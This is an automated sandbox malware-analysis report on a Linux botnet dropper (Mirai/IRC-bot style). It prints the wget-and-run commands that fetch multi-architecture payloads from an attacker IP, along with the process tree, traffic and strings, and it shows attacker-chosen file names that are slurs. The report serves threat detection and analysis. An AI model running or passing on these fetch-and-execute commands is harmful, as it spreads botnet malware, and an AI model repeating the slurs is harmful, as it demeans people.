Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report

Overview

General Information

Analysis ID:1417457
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Deletes system log files
Drops files in suspicious directories
Machine Learning detection for dropped file
Manipulation of devices in /dev
Sample deletes itself
Sample tries to kill multiple processes (SIGKILL)
Deletes log files
Detected TCP or UDP traffic on non-standard ports
ELF contains segments with high entropy indicating compressed/encrypted content
Enumerates processes within the "proc" file system
Executes the "chmod" command used to modify permissions
Executes the "rm" command used to delete files or directories
Executes the "wget" command typically used for HTTP/S downloading
Found strings indicative of a multi-platform dropper
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Yara signature match

Classification

Analysis Advice

Non-zero exit code suggests an error during the execution. Lookup the error code for hints.

General Information

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1417457
Start date and time:2024-03-29 10:39:42 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 31s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxcmdlinecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal80.spre.evad.lin@0/12@1/0

Warnings

  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Runtime Messages

Command:/bin/sh -c "wget http:/94.156.8.244/wtf.sh; /bin/sh wtf.sh"
PID:6217
Exit Code:1
Exit Code Info:
Killed:False
Standard Output:
faggot got malware'd
faggot got malware'd
Standard Error:--2024-03-29 10:40:16-- http://94.156.8.244/wtf.sh
Connecting to 94.156.8.244:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1612 (1.6K) [application/x-shellscript]
Saving to: wtf.sh

0K . 100% 2.12M=0.001s

2024-03-29 10:40:17 (2.12 MB/s) - wtf.sh saved [1612/1612]

--2024-03-29 10:40:17-- http://94.156.8.244/mips
Connecting to 94.156.8.244:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 35440 (35K) [application/octet-stream]
Saving to: lol

0K .......... .......... .......... .... 100% 154K=0.2s

2024-03-29 10:40:17 (154 KB/s) - lol saved [35440/35440]

--2024-03-29 10:40:18-- http://94.156.8.244/mpsl
Connecting to 94.156.8.244:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 36568 (36K) [application/octet-stream]
Saving to: lmao

0K .......... .......... .......... ..... 100% 91.3K=0.4s

utime(lmao): No such file or directory
2024-03-29 10:40:19 (91.3 KB/s) - lmao saved [36568/36568]

chmod: cannot access 'lmao': No such file or directory
wtf.sh: 2: ./lmao: not found
--2024-03-29 10:40:19-- http://94.156.8.244/x86_64
Connecting to 94.156.8.244:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 36188 (35K) [application/octet-stream]
Saving to: faggot

0K .......... .......... .......... ..... 100% 89.8K=0.4s

utime(faggot): No such file or directory
2024-03-29 10:40:21 (89.8 KB/s) - faggot saved [36188/36188]

chmod: cannot access 'faggot': No such file or directory
wtf.sh: 3: ./faggot: not found
--2024-03-29 10:40:21-- http://94.156.8.244/arm
Connecting to 94.156.8.244:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34240 (33K) [application/octet-stream]
Saving to: gay

0K .......... .Killed
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Segmentation fault (core dumped)
--2024-03-29 10:40:23-- http://94.156.8.244/arm5
Connecting to 94.156.8.244:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 32736 (32K) [application/octet-stream]
Saving to: retard

0K .......... .......... .......... . 100% 113K=0.3s

2024-03-29 10:40:24 (113 KB/s) - retard saved [32736/32736]

--2024-03-29 10:40:31-- http://94.156.8.244/arm6
Connecting to 94.156.8.244:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 36932 (36K) [application/octet-stream]
Saving to: nigger

0K .......... .......... .......... ...... 100% 105K=0.3s

utime(nigger): No such file or directory
2024-03-29 10:40:32 (105 KB/s) - nigger saved [36932/36932]

chmod: cannot access 'nigger': No such file or directory
wtf.sh: 6: ./nigger: not found
--2024-03-29 10:40:32-- http://94.156.8.244/arm7
Connecting to 94.156.8.244:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 58172 (57K) [application/octet-stream]
Saving to: shit

0K ........Killed
chmod: cannot access 'shit': No such file or directory
wtf.sh: 7: ./shit: not found
--2024-03-29 10:40:34-- http://94.156.8.244/i586
Connecting to 94.156.8.244:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31580 (31K) [application/octet-stream]
Saving to: nigga

0K .......... .......... .......... 100% 98.3K=0.3s

utime(nigga): No such file or directory
2024-03-29 10:40:35 (98.3 KB/s) - nigga saved [31580/31580]

chmod: cannot access 'nigga': No such file or directory
wtf.sh: 8: ./nigga: not found
--2024-03-29 10:40:35-- http://94.156.8.244/i686
Connecting to 94.156.8.244:80... Killed
chmod: cannot access 'kekw': No such file or directory
wtf.sh: 9: ./kekw: not found
--2024-03-29 10:40:36-- http://94.156.8.244/powerpc
Connecting to 94.156.8.244:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 32544 (32K) [application/octet-stream]
Saving to: what

0K .......... .......... .......... . 100% 92.6K=0.3s

utime(what): No such file or directory
2024-03-29 10:40:37 (92.6 KB/s) - what saved [32544/32544]

chmod: cannot access 'what': No such file or directory
wtf.sh: 10: ./what: not found
--2024-03-29 10:40:38-- http://94.156.8.244/sh4
Connecting to 94.156.8.244:80... connected.
HTTP request sent, awaiting response... Killed
chmod: cannot access 'kys': No such file or directory
wtf.sh: 11: ./kys: not found
--2024-03-29 10:40:39-- http://94.156.8.244/m68k
Connecting to 94.156.8.244:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 82376 (80K) [application/octet-stream]
Saving to: shiteater

0K .......... .......... .......... .......... .......... 62% 90.0K 0s
50K .......... .......... .......... Killed
chmod: cannot access 'shiteater': No such file or directory
wtf.sh: 12: ./shiteater: not found
--2024-03-29 10:40:41-- http://94.156.8.244/sparc
Connecting to 94.156.8.244:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 83312 (81K) [application/octet-stream]
Saving to: blyat

0K .......... .......... .......... .......... .......... 61% 91.9K 0s
50K .......... .......... .......... . 100% 117K=0.8s

Killed
chmod: cannot access 'blyat': No such file or directory
wtf.sh: 13: ./blyat: not found
rm: cannot remove 'wtf.sh': No such file or directory

Process Tree

  • system is lnxubuntu20
  • sh (PID: 6217, Parent: 6129, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "wget http://94.156.8.244/wtf.sh; /bin/sh wtf.sh"
    • sh New Fork (PID: 6218, Parent: 6217)
    • wget (PID: 6218, Parent: 6217, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget http://94.156.8.244/wtf.sh
    • sh New Fork (PID: 6219, Parent: 6217)
    • sh (PID: 6219, Parent: 6217, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh wtf.sh
      • sh New Fork (PID: 6220, Parent: 6219)
      • wget (PID: 6220, Parent: 6219, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -O lol http://94.156.8.244/mips
      • sh New Fork (PID: 6221, Parent: 6219)
      • chmod (PID: 6221, Parent: 6219, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x lol
      • sh New Fork (PID: 6222, Parent: 6219)
      • lol (PID: 6222, Parent: 6219, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: ./lol 0day
        • lol New Fork (PID: 6224, Parent: 6222)
          • lol New Fork (PID: 6226, Parent: 6224)
          • lol New Fork (PID: 6228, Parent: 6224)
            • lol New Fork (PID: 6231, Parent: 6228)
              • lol New Fork (PID: 6234, Parent: 6231)
              • lol New Fork (PID: 6262, Parent: 6231)
      • sh New Fork (PID: 6233, Parent: 6219)
      • wget (PID: 6233, Parent: 6219, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -O lmao http://94.156.8.244/mpsl
      • sh New Fork (PID: 6256, Parent: 6219)
      • chmod (PID: 6256, Parent: 6219, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x lmao
      • sh New Fork (PID: 6257, Parent: 6219)
      • sh New Fork (PID: 6258, Parent: 6219)
      • wget (PID: 6258, Parent: 6219, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -O faggot http://94.156.8.244/x86_64
      • sh New Fork (PID: 6399, Parent: 6219)
      • chmod (PID: 6399, Parent: 6219, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x faggot
      • sh New Fork (PID: 6402, Parent: 6219)
      • sh New Fork (PID: 6403, Parent: 6219)
      • wget (PID: 6403, Parent: 6219, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -O gay http://94.156.8.244/arm
      • sh New Fork (PID: 6404, Parent: 6219)
      • chmod (PID: 6404, Parent: 6219, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x gay
      • sh New Fork (PID: 6405, Parent: 6219)
      • gay (PID: 6405, Parent: 6219, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: ./gay 0day
      • sh New Fork (PID: 6409, Parent: 6219)
      • wget (PID: 6409, Parent: 6219, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -O retard http://94.156.8.244/arm5
      • sh New Fork (PID: 6410, Parent: 6219)
      • chmod (PID: 6410, Parent: 6219, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x retard
      • sh New Fork (PID: 6411, Parent: 6219)
      • retard (PID: 6411, Parent: 6219, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: ./retard 0day
        • retard New Fork (PID: 6417, Parent: 6411)
          • retard New Fork (PID: 6419, Parent: 6417)
            • retard New Fork (PID: 6450, Parent: 6419)
            • retard New Fork (PID: 6452, Parent: 6419)
            • retard New Fork (PID: 6454, Parent: 6419)
            • retard New Fork (PID: 6479, Parent: 6419)
            • retard New Fork (PID: 6482, Parent: 6419)
            • retard New Fork (PID: 6486, Parent: 6419)
            • retard New Fork (PID: 6492, Parent: 6419)
            • retard New Fork (PID: 6494, Parent: 6419)
            • retard New Fork (PID: 6496, Parent: 6419)
            • retard New Fork (PID: 6502, Parent: 6419)
            • retard New Fork (PID: 6511, Parent: 6419)
            • retard New Fork (PID: 6513, Parent: 6419)
            • retard New Fork (PID: 6519, Parent: 6419)
            • retard New Fork (PID: 6521, Parent: 6419)
            • retard New Fork (PID: 6549, Parent: 6419)
            • retard New Fork (PID: 6552, Parent: 6419)
            • retard New Fork (PID: 6558, Parent: 6419)
            • retard New Fork (PID: 6561, Parent: 6419)
            • retard New Fork (PID: 6565, Parent: 6419)
            • retard New Fork (PID: 6568, Parent: 6419)
            • retard New Fork (PID: 6571, Parent: 6419)
            • retard New Fork (PID: 6578, Parent: 6419)
            • retard New Fork (PID: 6579, Parent: 6419)
            • retard New Fork (PID: 6586, Parent: 6419)
            • retard New Fork (PID: 6588, Parent: 6419)
            • retard New Fork (PID: 6593, Parent: 6419)
            • retard New Fork (PID: 6598, Parent: 6419)
            • retard New Fork (PID: 6603, Parent: 6419)
            • retard New Fork (PID: 6605, Parent: 6419)
            • retard New Fork (PID: 6610, Parent: 6419)
            • retard New Fork (PID: 6612, Parent: 6419)
            • retard New Fork (PID: 6618, Parent: 6419)
            • retard New Fork (PID: 6622, Parent: 6419)
            • retard New Fork (PID: 6624, Parent: 6419)
            • retard New Fork (PID: 6627, Parent: 6419)
            • retard New Fork (PID: 6636, Parent: 6419)
            • retard New Fork (PID: 6641, Parent: 6419)
            • retard New Fork (PID: 6643, Parent: 6419)
            • retard New Fork (PID: 6650, Parent: 6419)
            • retard New Fork (PID: 6653, Parent: 6419)
            • retard New Fork (PID: 6659, Parent: 6419)
            • retard New Fork (PID: 6660, Parent: 6419)
            • retard New Fork (PID: 6665, Parent: 6419)
            • retard New Fork (PID: 6668, Parent: 6419)
            • retard New Fork (PID: 6675, Parent: 6419)
            • retard New Fork (PID: 6678, Parent: 6419)
            • retard New Fork (PID: 6684, Parent: 6419)
            • retard New Fork (PID: 6687, Parent: 6419)
          • retard New Fork (PID: 6421, Parent: 6417)
            • retard New Fork (PID: 6423, Parent: 6421)
              • retard New Fork (PID: 6426, Parent: 6423)
              • retard New Fork (PID: 6431, Parent: 6423)
              • retard New Fork (PID: 6436, Parent: 6423)
              • retard New Fork (PID: 6444, Parent: 6423)
              • retard New Fork (PID: 6448, Parent: 6423)
      • sh New Fork (PID: 6425, Parent: 6219)
      • wget (PID: 6425, Parent: 6219, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -O nigger http://94.156.8.244/arm6
      • sh New Fork (PID: 6428, Parent: 6219)
      • chmod (PID: 6428, Parent: 6219, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x nigger
      • sh New Fork (PID: 6429, Parent: 6219)
      • sh New Fork (PID: 6430, Parent: 6219)
      • wget (PID: 6430, Parent: 6219, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -O shit http://94.156.8.244/arm7
      • sh New Fork (PID: 6433, Parent: 6219)
      • chmod (PID: 6433, Parent: 6219, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x shit
      • sh New Fork (PID: 6434, Parent: 6219)
      • sh New Fork (PID: 6435, Parent: 6219)
      • wget (PID: 6435, Parent: 6219, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -O nigga http://94.156.8.244/i586
      • sh New Fork (PID: 6438, Parent: 6219)
      • chmod (PID: 6438, Parent: 6219, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x nigga
      • sh New Fork (PID: 6439, Parent: 6219)
      • sh New Fork (PID: 6440, Parent: 6219)
      • wget (PID: 6440, Parent: 6219, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -O kekw http://94.156.8.244/i686
      • sh New Fork (PID: 6443, Parent: 6219)
      • chmod (PID: 6443, Parent: 6219, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x kekw
      • sh New Fork (PID: 6446, Parent: 6219)
      • sh New Fork (PID: 6447, Parent: 6219)
      • wget (PID: 6447, Parent: 6219, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -O what http://94.156.8.244/powerpc
      • sh New Fork (PID: 6458, Parent: 6219)
      • chmod (PID: 6458, Parent: 6219, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x what
      • sh New Fork (PID: 6477, Parent: 6219)
      • sh New Fork (PID: 6478, Parent: 6219)
      • wget (PID: 6478, Parent: 6219, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -O kys http://94.156.8.244/sh4
      • sh New Fork (PID: 6481, Parent: 6219)
      • chmod (PID: 6481, Parent: 6219, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x kys
      • sh New Fork (PID: 6484, Parent: 6219)
      • sh New Fork (PID: 6485, Parent: 6219)
      • wget (PID: 6485, Parent: 6219, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -O shiteater http://94.156.8.244/m68k
      • sh New Fork (PID: 6499, Parent: 6219)
      • chmod (PID: 6499, Parent: 6219, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x shiteater
      • sh New Fork (PID: 6500, Parent: 6219)
      • sh New Fork (PID: 6501, Parent: 6219)
      • wget (PID: 6501, Parent: 6219, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -O blyat http://94.156.8.244/sparc
      • sh New Fork (PID: 6504, Parent: 6219)
      • chmod (PID: 6504, Parent: 6219, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x blyat
      • sh New Fork (PID: 6505, Parent: 6219)
      • sh New Fork (PID: 6506, Parent: 6219)
      • rm (PID: 6506, Parent: 6219, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm wtf.sh
  • sh (PID: 6259, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
  • gsd-rfkill (PID: 6259, Parent: 1477, MD5: 88a16a3c0aba1759358c06215ecfb5cc) Arguments: /usr/libexec/gsd-rfkill
  • systemd New Fork (PID: 6268, Parent: 1)
  • systemd-hostnamed (PID: 6268, Parent: 1, MD5: 2cc8a5576629a2d5bd98e49a4b8bef65) Arguments: /lib/systemd/systemd-hostnamed
  • gdm3 New Fork (PID: 6400, Parent: 1320)
  • Default (PID: 6400, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6401, Parent: 1320)
  • Default (PID: 6401, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • cleanup

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapLinux_Trojan_Ircbot_bb204b81unknownunknown
  • 0x1fa1c:$a: 0F 44 C8 4C 5E F8 8D EF 80 83 CD FF 31 DB 30 22

Dropped Files

SourceRuleDescriptionAuthorStrings
/tmp/faggot (deleted)Linux_Trojan_Ircbot_bb204b81unknownunknown
  • 0x898a:$a: 0F 44 C8 4C 5E F8 8D EF 80 83 CD FF 31 DB 30 22

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for dropped file
Source: /tmp/lmao (deleted)Avira: detection malicious, Label: EXP/ELF.Agent.M.28
Source: /tmp/what (deleted)Avira: detection malicious, Label: EXP/ELF.Agent.F.118
Source: /tmp/blyat (deleted)Avira: detection malicious, Label: EXP/ELF.Mirai.W
Machine Learning detection for dropped file
Source: /tmp/nigga (deleted)Joe Sandbox ML: detected
Source: /tmp/faggot (deleted)Joe Sandbox ML: detected
Source: shiteater (deleted).105.drString: %s/%s/proc//proc/%s/cmdlinewgetcurlnetstatgreppslsmvechokillbashrebootshutdownhaltpowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe/mnt/root/dev/null/dev/consoleyouare.geek/dev/watchdog/dev/misc/watchdog
Source: blyat (deleted).114.drString: %s/%s/proc//proc/%s/cmdlinerwgetcurlnetstatgreppslsmvechokillbashrebootshutdownhaltpowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe/mnt/root/dev/null/dev/consoleyouare.geek/dev/watchdog/dev/misc/watchdog/
Source: global trafficTCP traffic: 192.168.2.23:60508 -> 104.168.45.11:7722
Source: global trafficTCP traffic: 192.168.2.23:43278 -> 185.216.70.168:21425
Source: /bin/sh (PID: 6218)Wget executable: /usr/bin/wget -> wget http://94.156.8.244/wtf.shJump to behavior
Source: /bin/sh (PID: 6220)Wget executable: /usr/bin/wget -> wget -O lol http://94.156.8.244/mipsJump to behavior
Source: /bin/sh (PID: 6233)Wget executable: /usr/bin/wget -> wget -O lmao http://94.156.8.244/mpslJump to behavior
Source: /bin/sh (PID: 6258)Wget executable: /usr/bin/wget -> wget -O faggot http://94.156.8.244/x86_64Jump to behavior
Source: /bin/sh (PID: 6403)Wget executable: /usr/bin/wget -> wget -O gay http://94.156.8.244/armJump to behavior
Source: /bin/sh (PID: 6409)Wget executable: /usr/bin/wget -> wget -O retard http://94.156.8.244/arm5Jump to behavior
Source: /bin/sh (PID: 6425)Wget executable: /usr/bin/wget -> wget -O nigger http://94.156.8.244/arm6Jump to behavior
Source: /bin/sh (PID: 6430)Wget executable: /usr/bin/wget -> wget -O shit http://94.156.8.244/arm7Jump to behavior
Source: /bin/sh (PID: 6435)Wget executable: /usr/bin/wget -> wget -O nigga http://94.156.8.244/i586Jump to behavior
Source: /bin/sh (PID: 6440)Wget executable: /usr/bin/wget -> wget -O kekw http://94.156.8.244/i686Jump to behavior
Source: /bin/sh (PID: 6447)Wget executable: /usr/bin/wget -> wget -O what http://94.156.8.244/powerpcJump to behavior
Source: /bin/sh (PID: 6478)Wget executable: /usr/bin/wget -> wget -O kys http://94.156.8.244/sh4Jump to behavior
Source: /bin/sh (PID: 6485)Wget executable: /usr/bin/wget -> wget -O shiteater http://94.156.8.244/m68kJump to behavior
Source: /bin/sh (PID: 6501)Wget executable: /usr/bin/wget -> wget -O blyat http://94.156.8.244/sparcJump to behavior
Source: /tmp/lol (PID: 6222)Socket: 127.0.0.1::39123Jump to behavior
Source: /tmp/retard (PID: 6411)Socket: 127.0.0.1::39123Jump to behavior
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.11
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.244
Source: global trafficHTTP traffic detected: GET /wtf.sh HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /mips HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /mpsl HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /x86_64 HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /arm HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /arm5 HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /arm6 HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /arm7 HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /i586 HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /powerpc HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sh4 HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /m68k HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sparc HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: unknownDNS traffic detected: queries for: youare.geek
Source: lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmpString found in binary or memory: http://94.156.8.244/arm
Source: wtf.sh.12.drString found in binary or memory: http://94.156.8.244/arm5;
Source: wtf.sh.12.drString found in binary or memory: http://94.156.8.244/arm6;
Source: wtf.sh.12.drString found in binary or memory: http://94.156.8.244/arm7;
Source: wtf.sh.12.drString found in binary or memory: http://94.156.8.244/arm;
Source: lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmpString found in binary or memory: http://94.156.8.244/armwtf.sh;
Source: wtf.sh.12.drString found in binary or memory: http://94.156.8.244/i586;
Source: wtf.sh.12.drString found in binary or memory: http://94.156.8.244/i686;
Source: wtf.sh.12.drString found in binary or memory: http://94.156.8.244/m68k;
Source: wtf.sh.12.drString found in binary or memory: http://94.156.8.244/mips;
Source: wtf.sh.12.drString found in binary or memory: http://94.156.8.244/mpsl;
Source: wtf.sh.12.drString found in binary or memory: http://94.156.8.244/powerpc;
Source: wtf.sh.12.drString found in binary or memory: http://94.156.8.244/sh4;
Source: wtf.sh.12.drString found in binary or memory: http://94.156.8.244/sparc;
Source: wtf.sh.12.drString found in binary or memory: http://94.156.8.244/x86_64;
Source: lmao (deleted).26.dr, nigga (deleted).77.dr, what (deleted).89.dr, retard.55.dr, lol.16.dr, faggot (deleted).32.dr, nigger (deleted).65.drString found in binary or memory: http://upx.sf.net
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Ircbot_bb204b81 Author: unknown
Source: /tmp/faggot (deleted), type: DROPPEDMatched rule: Linux_Trojan_Ircbot_bb204b81 Author: unknown
Sample tries to kill multiple processes (SIGKILL)
Source: /tmp/lol (PID: 6224)SIGKILL sent: pid: -6224, result: unknownJump to behavior
Source: /tmp/lol (PID: 6228)SIGKILL sent: pid: 721, result: successfulJump to behavior
Source: /tmp/lol (PID: 6228)SIGKILL sent: pid: 904, result: successfulJump to behavior
Source: /tmp/lol (PID: 6228)SIGKILL sent: pid: 912, result: successfulJump to behavior
Source: /tmp/lol (PID: 6228)SIGKILL sent: pid: 918, result: successfulJump to behavior
Source: /tmp/lol (PID: 6228)SIGKILL sent: pid: 936, result: successfulJump to behavior
Source: /tmp/lol (PID: 6228)SIGKILL sent: pid: 1601, result: successfulJump to behavior
Source: /tmp/lol (PID: 6228)SIGKILL sent: pid: 1638, result: successfulJump to behavior
Source: /tmp/lol (PID: 6228)SIGKILL sent: pid: 1877, result: successfulJump to behavior
Source: /tmp/lol (PID: 6228)SIGKILL sent: pid: 6226, result: successfulJump to behavior
Source: /tmp/lol (PID: 6228)SIGKILL sent: pid: 6231, result: successfulJump to behavior
Source: /tmp/lol (PID: 6228)SIGKILL sent: pid: 6259, result: successfulJump to behavior
Source: /tmp/lol (PID: 6228)SIGKILL sent: pid: 6403, result: successfulJump to behavior
